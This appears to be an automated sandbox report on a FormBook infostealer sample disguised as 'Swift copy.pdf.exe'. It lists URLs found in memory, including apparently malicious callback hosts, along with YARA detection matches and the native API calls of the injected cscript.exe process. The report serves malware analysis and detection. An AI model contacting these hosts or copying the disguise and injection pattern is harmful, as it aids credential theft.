Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/arrow.png)
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png)
Source: Swift copy.pdf.exe, 00000000.00000002.351601216.0000000002791000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Swift copy.pdf.exe, 00000000.00000003.332048994.000000000576D000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlv
Source: explorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comL
Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coma-d
Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comdjq
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.
Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.n
Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coms
Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comu
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html8
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmll
Source: Swift copy.pdf.exe, 00000000.00000003.334358377.0000000005765000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comltom4~g
Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comm
Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.commH
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Swift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/n
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Swift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/z
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.indiafoodtraveling.com/px.js?ch=1
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.indiafoodtraveling.com/px.js?ch=2
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5Y
Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Aq
Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/o.H
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Swift copy.pdf.exe, 00000000.00000003.332090387.0000000005765000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: cscript.exe, 0000000A.00000002.591457906.00000000002C7000.00000004.00000020.sdmp | String found in binary or memory: http://www.stepmed.life/ifne/?AjR=cNnBXpKXSwxtuHjKs6rP8ZpLsoLiQU1uQw7AksJLx/bmQGd
Source: explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: Swift copy.pdf.exe, 00000000.00000003.328467490.000000000574B000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comF
          Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comS~
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnd&~u
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.n
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cns
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 0_2_06D23BBC NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_004181AA NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0497B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0497AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0497A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0497A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0497A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04979760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_03128390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_03128260 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_031282E0 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_031281B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_031281AA NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0493B150 appears 35 times
          Source: Swift copy.pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Swift copy.pdf.exe | Binary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.349185865.00000000001C2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.362132971.0000000006F50000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll" vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.362079019.0000000006D30000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll2 vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe | Binary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000004.00000002.347496434.0000000000112000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe | Binary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.390364207.000000000131F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.389481115.0000000000502000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe | Binary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
